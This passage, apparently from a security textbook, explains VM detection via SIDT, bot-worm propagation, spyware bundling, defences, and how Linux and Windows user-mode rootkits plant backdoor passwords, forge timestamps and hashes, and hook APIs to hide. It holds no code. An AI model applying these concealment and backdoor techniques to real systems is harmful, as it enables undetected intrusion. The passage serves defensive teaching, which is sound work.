A brilliant researcher named Joanna Rutkowska has introduced a tool at www.invisiblethings.org that detects a virtual machine environment in a much more subtle and fundamental way. Her tool is called the Red Pill, in homage to the Matrix movie where Keanu Reeves’ character Neo takes a Red Pill to leave the Matrix and enter the real world. The Red Pill program runs a single machine-language instruction for x86 processors, called SIDT. This instruction stores the contents of the Interrupt Descriptor Table Register (IDTR) in a given memory location.

You see, the IDTR points to a table in memory that tells the operating system where it should go to get code to handle various types of interrupts. Under normal circumstances, this interrupt table (pointed to by the IDTR) is typically located very near the start of system memory. Yet, when two machines are running on a single piece of hardware (which they are in the case of a host and guest operating system of a virtual machine environment), they cannot use the same IDTR, because that would make them pretty much the same operating system. Therefore, virtual machines typically have their own interrupt table located at a higher memory location than a real system’s interrupt table.

The Red Pill simply looks at the IDTR (via the SIDT instruction). If it is a small number (less than 0xd0), the Red Pill prints out a message saying that we are running on a real operating system. If it is greater than this value, the Red Pill says we’re on a virtual machine. It works amazingly well on both Linux and Windows, with both VMware and VirtualPC, and is extremely hard to dodge. I expect to see the technique used in the future iterations of bots very soon.

Distributing Bots: The Worm-Bot Feedback Loop

We’ve analyzed bot functionality and bot communications, but how do these bots get installed on a victim machine in the first place? Attackers sometimes rely on the same vectors for bot propagation they’ve historically used to deploy remote-control backdoors, namely, installing bots themselves or tricking users into installing them. Although such techniques certainly work, they can be difficult avenues by which to achieve a truly enormous bot-net. To improve their chances of conquering hundreds of thousands of victims with a bot, attackers have turned to worms.

Worms are self-replicating code that propagates across a network in an automated fashion. A worm conquers one machine using a given exploit, such as a buffer overflow vulnerability. Then, once lodged into that victim system, the worm uses it to scan for and compromise other machines. This new set of victims is likewise used to scan for and take over even more systems, resulting in an exponential rise in the number of systems with the worm installed.

Historically, worms focused on spreading copies of themselves. Worms begat worms, which begat more worms. But today, attackers are using worms and bots together. Suppose an attacker has compromised only ten measly machines with a bot. That bad guy could write a worm to infect new machines, and use those ten bot-infected boxes as a nice running start for worm distribution. Let’s suppose that those ten bots spread the worm to 100 systems each, resulting in 1,000 newly compromised machines. The attacker can include that vary same bot as a payload in the worm. When the worm takes over a new victim, it carries the bot (and with it, the attacker’s control) to that new system. Now, the bad guy is up more than 1,000 bot-infected systems, a 100-fold increase in the bot-net size. The attacker can then craft a new worm that exploits another flaw, using the more than 1,000 bot-infected machines to compromise, let’s say, another 100,000 machines, installing a bot on them as well. So, we’ve entered a vicious feedback loop, as illustrated in Figure 10.6. Bots are spreading worms, which are spreading bots, which are spreading even more worms. No wonder the bad guys are establishing vast bot-nets around the world!

Figure 10.6 Bots spread worms, which spread bots, which spread worms, which...

Image

One of the most popular forms of bot-worm combos is a mass-mailing worm that carries a bot. The attacker sends e-mail spam with an attachment claiming to be an important document or a critical system patch the user must install.

Some unsuspecting users run the attachment, which installs a worm–bot combo on their machines. The bot gives the attacker control. The worm component then harvests e-mail addresses from the users’ e-mail program, and forwards the same message to a new set of victims. Interestingly, many of these worms spoof the source address of the e-mail. So, suppose Victim A gets infected and has e-mail messages from Victim B and Victim C in his e-mail client. The nasty worm then sends an e-mail from Victim A’s machine, with a source e-mail address of Victim B and a destination address of Victim C. Victim C will not even realize that Victim A is infected, and might trust the e-mail appearing to come from Victim B. With thousands of e-mail addresses harvested from Victim A, this tactic can spread the worm and bot to a big number of new victims, where the cycle repeats itself. We’ve seen such tactics applied to many worms that carry bots, including variations of the widespread Sobig, Bagle, Netsky, and MyDoom malicious code. Such techniques are likewise applied in phishing attacks.

Additional Nastiness: Spyware Everywhere!

In addition to remote-control backdoors and bots, another frustratingly common form of application-level Trojan horse backdoor is spyware. The Internet today is a cesspool of spyware, with the threat growing all the time as unscrupulous advertisers and scam artists aggressively foist their spyware on huge numbers of users around the world. Some innocent Web surfers are often shocked to discover dozens or even hundreds of spyware specimens installed on their systems. Spyware, as its name implies, spies on users to watch their activities on their machine on behalf of the spyware’s author or controller. This spying ranges from fairly innocuous activities to major invasions of users’ privacy, possibly even leading to identity theft. Some of the most popular spyware capabilities are summarized in Table 10.5. It is important to note a distinction between spyware and the backdoors and bots we’ve been analyzing. The remote-control backdoors of Table 10.3 and the bots of Table 10.4 typically include huge amalgamations of different functional doo-dads, bundling together many different rows from those tables into a single package. Individual spyware specimens, however, tend to be pretty focused, with each spyware package typically offering only one or two functions listed in Table 10.5. Some would consider this a major limitation, but, as someone who values privacy, I’m happy we haven’t seen all of these capabilities bundled together in a single package ... yet!

Table 10.5 A Sampling of Spyware Functionality

Image

So this spyware is capable of some pretty invasive stuff, but how does it get installed on a victim machine in the first place? In some instances, spyware rides along inside a bot, installed by an attacker or a worm. However, by far the most common method of spyware propagation is users themselves, who are tricked into installing spyware that is bundled with other programs. Some of the add-on search bars for popular browsers include spyware that aggregates user surfing habits or even tailors search results based on advertisers’ wishes. Some computer games available for free or even on a commercial basis include spyware capabilities. A few other unique system add-ons, such as those annoying little animated mouse cursors, special screen backgrounds, and screen savers carry an undocumented extra spyware bonus packaged with their main functionality. A few pornographic Web sites require users to install special video player software or other tools to optimize those sites’ images on users’ machines. Such tools quite often include specialized spyware devoted to the porn industry.

Sometimes, spyware itself is disguised as an antispyware program, designed to trick users into installing it on their systems, thinking that they’ve gotten some level of protection. In particular, the wonderful Ad-Aware program by Lavasoft is a really good antispyware program, detecting many forms of spyware on a machine. Ad-Aware is available for free as a tool that you run on demand, or on a commercial basis with extra features like real-time spyware installation detection. I use Ad-Aware on my own machine on a regular basis and have been very pleased with its results in fighting nasty spyware. However, there are some evil imposters out there, with tools sometimes named A-daware and even Ada-ware that pretend to be the normal, wholesome Ad-Aware. Sadly, the imposters actually install spyware on users’ machines. Because of this concern, make sure you use Ad-Aware downloaded only from www.lavasoft.com and those mirrors that the main site directly links to. Otherwise, you never know what you’re going to get!

So many programs available for free download on the Internet today include spyware because the companies behind the spyware have made it economically beneficial for these programs’ authors to bundle in a little bit of spyware. I recently received a message from a software developer who had written a rather popular computer game, downloaded by 200,000 people over the last year. The game is available for free, and the author created it as a labor of love and to have some fun. This game author had received e-mail from a spyware purveyor containing a pretty lucrative offer. By adding a couple of small additional programs to his game installation package, this developer would reap significant financial rewards. For each installation of a tool that aggregates user surfing habits, the developer would receive a nickel. With every install of a search bar that would filter and inject ads into a user’s browser, the developer would get a dime. For a pop-up ad generator, the developer got a quarter. And there were several other options offered on this spyware purveyor’s menu. With the whole menu in view, the developer realized that by bundling all of these spyware options into his game program, he could make approximately 95 cents for each installation. With over 200,000 people installing his game every year, the developer could make some serious cash on the side, almost $200,000 per year in extra income! Happily, the game author that e-mailed me was horrified at even receiving the offer, and never included these functions in the game. Sadly, however, not all software developers are so scrupulous. Many of them succumb to these scary offers, lacing their programs with an unadvertised spyware bonus. In effect, their programs actually become Trojan horse backdoors. They tease users with one useful or benign function, while surreptitiously installing another function that gives the attacker some level of access to or control over the victim machine and user.

Besides bundling with other programs, spyware (and other forms of malicious code) are increasingly propagating via Web browser vulnerabilities. As we discussed in Chapter 7, attackers have exploited otherwise-innocent Web sites and placed malicious code designed to infect machines that browse these now-toxic sites. By simply surfing to the wrong site with a vulnerable browser, a victim machine becomes infected with spyware.

Defenses Against Application-Level Trojan Horse Backdoors, Bots, and Spyware

Bare Minimum: Use Antivirus and Antispyware Tools

The vast majority of the remote-control backdoors and bots described in this chapter have a well-known way of altering the system, adding particular Registry keys, creating specific files, and starting certain services. Antivirus programs include signatures to detect these artifacts created by each tool on a hard drive and in system memory. Although remote-control backdoors and bots are not computer viruses (because they do not automatically infect other applications or documents), they can be detected by antivirus tools. All of the major antivirus program vendors have released versions of their software that can detect and remove the most popular evil backdoors and bots. It’s important to note, however, that most antivirus tools do not have signatures for Netcat and VNC, two programs sometimes used legitimately, but often abused by attackers as remote-control backdoors.

Beyond the backdoors and bots, which can be controlled by antivirus tools, we also need to deploy antispyware tools diligently. These tools include signatures to look for the most common forms of spyware on the Internet. Some antivirus tools even include antispyware capabilities. Unfortunately, the antispyware capabilities of some of the antivirus tools are watered down, due to economic and legal factors. From an economic perspective, some antivirus vendors limit the comprehensiveness of the signature base of their bundled antispyware capabilities to help encourage customers to buy a separate add-on antispyware tool. Rather than selling one program to a user, the vendor can now sell two.

From a legal perspective, some spyware purveyors have sued antivirus companies, claiming that their so-called spyware programs aren’t, in fact, malicious. They point out that their programs are merely helping to customize the user’s Web experience based on that user’s particular needs and habits. Underscoring their position, these spyware people point out that their licensing agreements specifically tell users how their information will be gathered and used, and that users must agree to these actions before the program is installed. Of course, this licensing agreement is typically several pages long, written in indecipherable legalese, and flashed quickly on the user’s screen in small text with a big OK button that many users reflexively click. Thus, argue these spyware vendors, they’ve gotten the user’s permission, and therefore their tools aren’t evil. One person’s spyware is another person’s meal ticket, I suppose. When an antivirus company labels spyware as malicious, that costs the spyware authors money, so they sometimes respond with lawsuits. Many antispyware programs get around this legal imbroglio by not calling discovered spyware specimens “malicious code.” Instead, any discovered spyware is labeled Potentially Unwanted Programs (PUPs). It’s up to the user to evaluate whether a given PUP should be there or should be deleted, so the antispyware vendor has thus dodged some significant legal problems.

To deal with these issues, I prefer to run both an antivirus tool and a separate antispyware tool on each of my machines to get two layers of protection, one against each type of threat. That way, I don’t have to worry about watered-down antispyware capabilities impacted by economic or legal wrangling. I can also carefully manage my PUPs based on my own needs. And, best of all, some of the antispyware tools label Netcat and VNC as a PUP, letting me make the decision of whether it’s my own version of these tools installed for administration, or some evildoer’s version that I want to eradicate.

Because attackers are constantly developing new remote-control backdoors, bots, and spyware, it is critical for organizations to load the latest antivirus and antispyware definitions into antivirus and antispyware software. These virus definition files should be updated daily or as new signatures are released. The antivirus and antispyware vendors have all developed capabilities to download virus definitions across the Internet, and have included automatic installation of the latest checks. By taking time to implement an effective antivirus and antispyware program, users and organizations can minimize the threat posed by application-level Trojan horses and greatly improve the security of their critical information resources.

Looking for Unusual TCP and UDP Ports

Many of the remote-control backdoors and bots we’ve discussed listen on a given TCP or UDP port. These ports can be discovered using a variety of mechanisms that we discussed in Chapter 6, Phase 2: Scanning. Remember, the built-in Windows netstat command, as well as third-party tools like TCPView, Fport, and ActivePorts, can help you find strange listening ports on a Windows machine. On Linux and UNIX, the netstat command comes in handy as well, along with the lsof -i command.

Knowing Your Software

Although antivirus and antispyware tools provide a good deal of protection, in the end, you have to be wary of what you run on your systems. Understand who wrote your software and what it is supposed to do. When you troll the Internet and find some apparently new, useful tool, be very careful with it! Can you trust it? Antivirus and antispyware tools can help here by checking to see if the executable has any detectable signatures of malicious software. However, antivirus and antispyware tools are not a panacea. They only know certain characteristics of malicious software, and cannot predict the maliciousness of all programs.

Therefore, beyond virus and spyware checking, you should consider the developer of the program you are downloading. Is the developer trustworthy? Do you really want to run a program you downloaded from www.thisevilprogramwillannihilateyourcomputer.com, even if your antivirus and antispyware scanners give it an apparent clean bill of health? To avoid problems with application-level Trojan horse backdoor tools, only run software from trusted developers. Of course, many of the tools discussed in this book come from developers you might not trust. That is why you should use them with such care, on nonproduction systems for evaluation purposes.

So, who is a trusted developer, and how do you make sure software came from a trusted source? The software development community has developed a variety of techniques to determine the trustworthiness of software. Many software programs distributed on the Internet include a digital fingerprint so a user can verify that the program has not been altered. Other developers go further and include a digital signature to identify the developer of the program and verify its integrity. By recalculating the fingerprint or verifying the signature of a downloaded program, a user can be more certain that the program was written by the developer and was not altered by an attacker.

Digital fingerprints are typically implemented using a hash algorithm. The Message Digest 5 (MD5) algorithm and the Secure Hash Algorithm 1 (SHA-1) are common routines used by software developers to create a digital fingerprint. By running a program such as md5sum or sha1sum, which are distributed with many Linux operating systems, the developer creates a digital fingerprint. This fingerprint is stored in a safe place, such as the developer’s own Web site or a high-profile public Web site. After downloading a program from the developer, users can calculate the fingerprint of the program on their own system using md5sum or sha1sum on Linux. Alternatively, you could rely on the md5deep and sha1deep programs for Linux, UNIX, and Windows, written by Jesse Kornblum and distributed for free. The public fingerprint can be compared with the just-calculated fingerprint of the downloaded program to verify the program hasn’t been altered. In this way, fingerprints give users assurance of the integrity of a program. Figure 10.7 shows an MD5 fingerprint at the very useful www.rpmfind.net Web site for the sniffer program, tcpdump. Still, you need to be careful. If attackers break into a software distribution site, they might load a Trojan horse backdoor of the software and alter the MD5 sum or SHA-1 hash on the site to match their own malicious code. For this reason, I always download a new program from a couple of different mirrors and compare the hashes between the different sites to minimize the chance of an attacker substituting evil code in place of the program I want to use.

Figure 10.7 MD5 hash of tcpdump helps ensure it hasn’t been Trojanized.

Image

Going further, other programs carry a digital signature created by the program’s developer. These digital signatures provide integrity assurances and authentication of the tool’s developer. For example, a developer could use the PGP or Gnu Privacy Guard (GnuPG) programs to digitally sign the code. Alternatively, Microsoft has created its Authenticode initiative for digitally signing software developed for Microsoft platforms. By using a PGP- or GnuPG-compatible program or Internet Explorer’s built in Authenticode signature capabilities, a user can check the signature of a program to verify that the program came from a given developer and hasn’t been altered.

So with these technologies, you can verify that a program was not altered and that it was written by a given developer. That still leaves open the issue of whether you can trust that developer. Who can you trust, after all? Can you trust the software from a major software company? Perhaps. Can you trust the software from a small developer on the Internet you’ve never heard of until you stumbled on their latest cool game? That is purely a policy issue, and a decision you have to make for yourself and your organization.

User Education Is Also Critical

To prevent application-level Trojan horse backdoor attacks, you must configure your browsers conservatively so they don’t automatically run ActiveX controls downloaded from the network. All of your Web users should be educated to avoid alteration of the security settings of their browsers. In particular, the browser should be configured to execute only signed ActiveX controls from trusted software houses. Better yet, just disable all ActiveX—now there’s an idea! Of course, if you turn off all ActiveX, some applications on the Internet might not work. Figure 10.8 shows the security settings of Internet Explorer that cover downloading and running ActiveX controls, located in your browser under Tools Image Internet Options Image Security Image Custom Level. If users alter these settings, they could cause major trouble, allowing malicious software to seep in from the Web to be executed on a protected network.

Figure 10.8 Internet Explorer’s ActiveX control settings.

Image

Because of these concerns, you might want to block ActiveX controls without proper digital signatures from trusted sources at your firewalls to prevent them from coming into your network. Several firewall vendors have the ability to drop all improperly signed ActiveX controls. By blocking bad ActiveX controls at the perimeter of your network, you won’t have to worry about these beasts getting through your barriers.

Finally, educate your user base about phishing attacks, and make sure they don’t respond to unsolicited e-mail that appears to come from e-commerce sites or banks. Whenever they surf to a Web site that requests sensitive information, users should check to make sure that any certificates associated the site appear to come from a legitimate site and a legitimate Certificate Authority. If you find some nefarious phishing e-mail, report it to the Anti-Phishing Working Group, at www.antiphishing.org, a great team that works to stomp out phishing by shutting down phishers’ Web sites and improving user awareness.

Even Nastier: User-Mode Rootkits

The application-level Trojan horse backdoors we’ve discussed so far (Netcat listeners, remote-control backdoors, bots, and spyware) are separate applications that an attacker adds to a system to act as a backdoor. Although these application-level Trojan horse backdoors are very powerful, they are often detectable because they are separate application-level programs running on a machine. Going back to our soup analogy from Table 10.2, you could use a poison detector to determine if someone has added poison to your soup. Similarly, by detecting the additional software running on a machine (using antivirus and antispyware programs, for example), a system administrator can investigate and detect the application-level Trojan horse backdoor.

User-mode rootkits are a more insidious form of Trojan horse backdoor than their application-level counterparts. User-mode rootkits raise the ante by altering or replacing existing operating system software, as shown in Figure 10.9. Rather than running as a foreign application (such as Netcat or a bot), usermode rootkits modify critical operating system executables or libraries to let an attacker have backdoor access and hide on the system. They are called user-mode rootkits because these tools alter the programs and libraries that users and administrators can invoke on a system, as opposed to the kernel-mode rootkits that change the heart of the operating system, the kernel, which we discuss later in this chapter. Back to our analogy, rather than adding poison to the soup, usermode rootkits genetically alter your existing potatoes so that they become poisonous, making detection even more difficult. There is no foreign additive to the soup; instead parts of the soup itself have been altered with malicious alternatives. By replacing or tweaking operating system components, rootkits can be far more powerful than application-level Trojan horse backdoors.

Figure 10.9 Comparing application-level Trojan horse backdoors with user-mode rootkits (for Linux and UNIX systems in this example).

Image

User-mode rootkits have been around for well over a decade, with the first very powerful rootkits detected in the early 1990s on UNIX systems. Many of the early rootkits were kept within the underground hacker community and distributed via IRC for a few years. Throughout the 1990s and into the new millennium, user-mode rootkits have become more and more powerful and radically easier to use. Now, user-mode rootkit variants are available that practically install themselves, allowing an attacker to “rootkit” a machine in less than ten seconds.

What Do User-Mode Rootkits Do?

Contrary to what their name implies, rootkits do not allow an attacker to gain root access to a system initially. Rootkits depend on the attackers’ having already obtained super-user access (that is, root on Linux and UNIX machines, or administrator or SYSTEM privileges on Windows machines). In a rootkit attack, this super-user access is likely obtained using the techniques described in Chapters 7 and 8, including buffer overflows, password cracking, session hijacking, and other means. Once an attacker conquers root, administrator, or SYSTEM privileges on a machine, a rootkit is a suite of tools that let the attacker maintain super-user access by implementing a backdoor and hiding evidence of the system compromise. User-mode rootkits are available for a variety of platforms, including Linux, BSD, Solaris, HP-UX, AIX, and other UNIX variations. Several usermode rootkits have also been released for Windows platforms as well. We’ll look at Linux/UNIX and Windows user-mode rootkits separately in this chapter.

Linux/UNIX User-Mode Rootkits

Most Linux and UNIX user-mode rootkits replace critical operating system files with new versions that let an attacker get backdoor access to the machine and hide the attacker’s presence on the box. Each rootkit might alter a half-dozen or more critical executables to achieve these goals. Most Linux/UNIX rootkits include several elements, including backdoors, sniffers, and various hiding tools, each of which we explore next.

Linux/UNIX User-Mode Rootkit Backdoors

Some of the most fundamental components of many user-mode rootkits for Linux and UNIX are a full complement of backdoor executables that replace existing operating system programs on the victim machine with new rootkit versions. But how do these rootkits implement their backdoors? To understand rootkit backdoors, it’s important to know what happens when you log in to a Linux or UNIX machine. When you log in to a system, whether by typing at the local keyboard or accessing the system across a network using telnet, the /bin/login program runs. Alternatively, if you log in using SSH, the ssh daemon runs, typically located in /usr/sbin/sshd. The system uses the login or sshd executables to gather and check the user authentication credentials, such as the user’s ID and password for /bin/login and the user’s public key for specific configurations of sshd. Once the user provides authentication credentials, the login or sshd program checks the system’s password file or the user’s SSH credentials to determine whether the authentication credentials are accurate. If they are okay, we’ve verified the user’s identity, so the login or sshd routine allows the user into the system.

Many user-mode rootkits replace the login and sshd programs with modified versions that include a backdoor password for root access hard-coded into the login and sshd executables themselves. If the attacker enters the backdoor root password, the modified login and sshd programs give access to the system, instantly as root. Even if the system administrator alters the legitimate root password for the system (or wipes the password file clean), the attacker can still log in as root using the backdoor password embedded in the login and sshd executables. So, a rootkit’s login and sshd routines are really backdoors, because they can be used to bypass normal system security controls. Furthermore, they are Trojan horses, because although they look like normal, happy programs, they are really evil backdoors.

Figure 10.10 shows a user logging onto a system before and after a user-mode rootkit is installed. In this example, the login routine is replaced with a backdoor version from the widely used Linux RootKit, lrk6. Note the subtle differences in behavior of the original login routine and the new backdoor version.

Figure 10.10 Behavior of a login executable before and after installation of a Linux rootkit.

Image

In Figure 10.10, the first difference we notice in the before and after pictures is the inclusion of the system name before the login prompt on the rootkitted system, which says “bob login:” instead of simply “login:”. Additionally, when we tried to log in as root, the original login routine requested our password. The system is configured to disallow incoming telnet as root, a common configuration on Linux and UNIX systems, so it gathered the password but wouldn’t allow the login. The original login executable just displayed the “login:” prompt again. The rootkitted login program however, displayed a message saying, “root login refused on this terminal.”

Of course, a more sophisticated attacker would first observe the behavior of the login routine, and very carefully select (or even construct) a rootkit login routine to make sure that it properly mimics the behavior of the original login routine. However, if the behavior of your login routine (or sshd executable) ever changes, as shown in Figure 10.10, this could be a tip-off that something is awry with your system. You should investigate immediately. The difference could be due to a patch or system configuration change, or it could be a sign of something sinister.

To detect backdoors like this, system administrators sometimes run various executables like the login and sshd programs through the strings command, a Linux/UNIX program that shows sequences of consecutive ASCII characters in a file. If an unfamiliar sequence of characters is found, it might be a backdoor password. After all, a login or sshd executable could have the backdoor password in it, which it uses to compare to see if the attacker is trying to get in. A mysterious appearance of a new, unexpected string in an executable could indicate a backdoor password.

The majority of rootkit developers know of this strings technique and developed a clever means for foiling it. In most of today’s rootkits, the backdoor password is split up and distributed throughout the backdoor executable program file, and is not a sequence of consecutive characters in the file. The password is only assembled in real time when the login or sshd routine is executed to check if the backdoor password has been entered. Therefore, the strings routine will not find the password in the executable, because it is not a sequence of characters.

Furthermore, when a user logs in to a Linux or UNIX system, the login and sshd programs normally record the newly authenticated user in the wtmp and utmp files. These accounting files are used by various programs, such as the who command, to show who is currently logged into the system. The rootkit versions of the login and sshd programs skip this critical step if the backdoor root password is used. Therefore, a system administrator that runs the who command will not be able to see the attacker logged in via the rootkit’s backdoors in login and sshd.

Linux/UNIX User-Mode Rootkits: Sniff Some Passwords

Once attackers have taken over one system, they usually install a sniffer to attempt to gather passwords and sensitive data going to other systems on the network. As described in Chapter 8, sniffers can be particularly effective for attackers trying to gain user IDs and passwords for other machines. Because of their usefulness, most rootkits include a simple sniffer that captures the first several characters of all sessions and writes them to a local file. By capturing the first characters of telnet, login, and FTP sessions, an attacker could gather the user IDs and passwords for numerous other users. An attacker can run the sniffer in the background and log in later to harvest the stored user IDs and passwords.

Linux/UNIX User-Mode Rootkits: Hide That Sniffer!

System administrators on many varieties of UNIX machines can run the program ifconfig to show the characteristics of the network interfaces. The ifconfig program shows information such as IP address, network mask, and MAC address for each network interface. Furthermore, ifconfig also displays which interfaces are in promiscuous mode, on most UNIX variations other than Solaris and Linux kernel 2.4 and later. Unfortunately, Solaris and recent Linux systems do not show promiscuous mode via ifconfig. The interface is placed in promiscuous mode if a sniffer is running on a system, gathering all data from the network without regard to its destination MAC address. By running ifconfig on some UNIX varieties, the administrator can detect the sniffer, as shown in Figure 10.11.

Figure 10.11 On some UNIX variations, ifconfig indicates sniffer use by showing the PROMISC flag.

Image

Of course, the attackers do not want the system administrators to discover their presence, so they counter this technique of searching for promiscuous mode. Most usermode rootkits for UNIX include a Trojan horse version of ifconfig that lies about the PROMISC flag, preventing system administrators from detecting the rootkit.

Additional Linux/UNIX User-Mode Rootkit Hiding Techniques

The majority of rootkits replace far more than the login and sshd programs with backdoor versions and the ifconfig command that hides promiscuou-smode. The same techniques applied to ifconfig for hiding critical evidence about an attacker’s presence are also employed against numerous other programs used by a system administrator. Table 10.6 shows some of the programs that are commonly replaced by Linux and UNIX rootkits to mask the attacker’s activities on the system.

Table 10.6 Programs Typically Replaced by Linux and UNIX Rootkits

Image

Each of these critical system programs is replaced with a Trojan horse alternative. Sure, they look and function like the normal programs, but they hide malicious behavior. Taken together, all of these Linux and UNIX programs are really the eyes and ears of a system administrator. They allow the administrator to determine what is happening on the system by examining network devices, the file system, and running processes. By replacing the system administrator’s eyes and ears, the attackers can very effectively hide their presence on a system.

User-Mode Rootkits: Covering the Tracks

Rootkits are designed to be as stealthy as possible, and include several techniques to mask the fact that a system is compromised. Many system administrators discover intrusions by observing changes in the last modified date of critical system files (like login, sshd, ls, ps, du, and other executables). Most user-mode rootkits for Linux and UNIX can alter the creation, modification, and last access time for any rootkit replacement files by setting these times back to their original value. The changed times are undetectable, because they are reset to their original value before the installation of the rootkit. Furthermore, using compression and padding routines, the rootkit replacements typically have the exact same size as the original executables.

Some Particular Examples of Linux/UNIX User-Mode Rootkits

A veritable zoo of user-mode rootkits is in widespread use today. A good sample of the diversity of rootkits can be found at www.packetstormsecurity.org/UNIX/penetration/rootkits, a location with more than 100 rootkit variations for numerous types of Linux and UNIX systems. The Linux RootKit 6 (lrk6), written by Lord Somer, is among the most fully featured rootkits available today. As its name implies, lrk6 targets Linux systems, and includes Trojan horse versions of the following programs:

Image

With all of these replacements, it’s a wonder anything is left standing on a system with lrk6.

The shv4 rootkit is another very popular user-mode rootkit for Linux that we have seen in many of our incident response investigations. Some versions of shv4 are incredibly easy to install, including a configuration program that loads, configures, and hides all Trojan horse executables with a single command. Even the backdoor login account name and password are automatically configured at the installation command line. The shv4 Trojan horse repertoire includes the following:

Image

Although this is a smaller number of replacements than lrk6, these shv4 rootkit alterations pack a powerful punch. Of the items in this list, the one that should jump out at you is the md5sum program. As we discussed earlier, this routine implements the MD5 hash algorithm, sometimes used by administrators to look for changes to critical system files. The shv4 rootkit replaces md5sum with a new version that lies about the MD5 hashes of certain other files included with the rootkit. Therefore, by running the built-in md5sum program on an shv4-infected system, the administrator will not notice any changes to the other programs included with the rootkit that the attacker configured the evil version of md5sum to disguise. Their MD5 hashes will appear (based on the lying md5sum replacement) to be the exact same value before rootkit was installed. To avoid this kind of problem, an administrator should run an md5sum program from trusted media, such as a CD-ROM or a write-lock protected USB memory drive. We’ll cover a couple of free CD-ROM images you can download for such analysis later in the chapter, when we address kernel-mode rootkits.

Windows User-Mode Rootkits

As we’ve seen, most Linux and UNIX user-mode rootkits replace critical operating system program files with evil substitutes. Most Windows user-mode rootkits opt for a slightly different approach: altering the memory of running processes associated with the operating system. By altering the memory of a running process, such as Task Manager or an executing netstat program, the attacker can hide processes and TCP and UDP port usage, without even changing the file associated with these executables on the hard drive. We’ve still got a user-mode rootkit, though, because the bad guy is altering the operating system components that users and administrators rely on. This change in tactics for Windows systems is caused by several factors, but two are paramount:

  • The difficulty Windows puts on altering critical files in the file system. Starting with Windows 2000 and later, Microsoft has included a built-in file integrity checker in Windows systems called Windows File Protection (WFP). This capability runs silently in the background, monitoring thousands of critical operating system files to see if they are changed in an unauthorized fashion. If WFP detects a change, it rolls back the original version of the file. Therefore, if an attacker replaces some critical files with rootkit versions, WFP quickly cleans up, and, in effect, uninstalls the rootkit. Although there are methods for disabling WFP, such tactics are not typically utilized, because it’s far easier to make a Windows rootkit without altering files on the file system.
  • The ease with which Windows lets one running process access another process. The Windows operating system includes various API calls that let one running process connect to and debug another running process, as long as the first process has debug rights. These rights are given to administrator accounts by default. Thus, an attacker can use an evil process running as administrator to connect to another running process, such as Task Manager. The evil process can then read and even change the memory inside the target process, overwriting software inside of that running process to change its behavior and capabilities.
Windows User-Mode Rootkit Hiding Tactics

Let’s analyze how a Windows user-mode rootkit can help an attacker hide on a Windows machine by altering running processes. First, we need to think about what an attacker might want to hide. The bad guys want to disguise their presence on a machine by making their malicious processes, files, Registry keys, and active TCP and UDP ports invisible to running programs on the machine. Most Windows applications used by administrators to look for these elements rely on a handful of API calls into the various Windows libraries, especially ntdll.dll, a big library used by many programs to interact with Windows itself. For example, the built-in Windows Task Manager makes various calls into certain critical libraries to determine which processes are running. Similarly, the dir command and Windows File Explorer use a specific set of API calls to determine which files are present on the machine. Likewise, regedit and netstat look for Registry keys and TCP and UDP ports, respectively, with certain calls. While each one of these programs is running, its process memory contains the code to invoke these functions so the program can display the system status.

A running rootkit can overwrite these API calls in each running process so that they point not to the normal Windows code to implement the function, but instead to the attacker’s own code. This process of using debug privileges to overwrite API calls in running processes is called API hooking. So a process like Task Manager will make an API call to get a list of running processes on the machine. Typically, Task Manager uses the NtQuerySystemInformation API call to get this list of processes. However, the rootkit process can overwrite this API call, so that Task Manager unknowingly accesses the attacker’s code. The attacker’s code will, likewise, get a list of running processes using the normal NtQuerySystemInformation API call. However, before giving the results back to Task Manager, the attacker’s code filters out certain processes from the list that the attacker doesn’t want the user to see. In effect, the attacker is wrapping the normal API handling code for NtQuerySystemInformation with the attacker’s own functionality. So, in the end, Task Manager will see only those running processes the attacker wants it to see.

Beyond Task Manager and the NtQuerySystemInformation API call, many Windows user-mode rootkits hook more than a dozen different API calls to hide various aspects of the system. Table 10.7 lists a handful of the most popular API calls on Windows machines that user-mode rootkits hook. It’s important to note that this list is a small sampling of some of the commonly hooked API calls. Some user-mode rootkits hook many additional API calls to hide on the system.

Table 10.7 A Small Sampling of Windows API Calls Hooked by Some Rootkits

Image

One of the more interesting items in Table 10.7 is the hook for the NtReadVirtualMemory call. Sometimes, investigators run debuggers to connect to running processes and interrogate memory for signs of API hooking, namely Windows API calls that have been overwritten with an attacker’s code. But investigators and their debuggers often rely on the NtReadVirtualMemory call to look for such signs of a rootkit. By hooking this API call, some rootkits attempt to thwart this style of investigation. When the NtReadVirtualMemory call is made, the attacker returns a normal-looking memory image to the debugger, masking any hints that the memory has been altered via API hooking. That’s very subtle, and an amazing feat of antidetection technology for the bad guys.

Implementing Windows User-Mode Rootkit Backdoors

In addition to API hooking for stealth capabilities, many Windows user-mode rootkits include a command-shell backdoor, similar in functionality to the Netcat command shell listeners we covered at the beginning of this chapter, offering up cmd.exe access across the network. It’s important to note that the backdoor program’s file, running process, and port number are all hidden using various API hooking mechanisms.

Some Particular Examples of Windows User-Mode Rootkits

One of the most popular user-mode rootkits for Windows is Hacker Defender (also known as hxdef), written by a rootkit designer who calls himself “holy father.” A nickname like that must make for interesting conversations with local clergy. Hacker Defender, located at http://hxdef.czweb.org, is designed not to defend a system against attackers. Quite the opposite is true, in fact. Hacker Defender is designed to defend the bad guys. The tool is centered around API hooking, which it uses to hide an enormous number of artifacts on a system that attackers might want to mask. Its features include the following:

  • Hiding files, processes, system services, system drivers, Registry keys and values, and TCP and UDP ports.
  • Lying to users and administrators about how much free space is available on the hard drive, so an attacker can mask the size of archives of pirated software, sniffed passwords, pornography, and other items the attacker has deposited on the system.
  • Hiding the alterations it makes to running processes when hooking APIs to thwart investigators using debuggers.
  • Creating a remotely accessible command-shell backdoor, made invisible on the local system through the API hooking mechanisms.
  • Implementing a relay that redirects packets across a network, obscuring their source, like the Netcat relays we covered in Chapter 8, and the remote-control backdoor capabilities we discussed in this chapter.

All of this functionality is achieved by a new service introduced into the system, called hxdef by default, that runs in the background and monitors system activities to make sure everything is hidden appropriately. Oh, and, of course, this hxdef process itself is hidden from view using the same API hooking procedures.

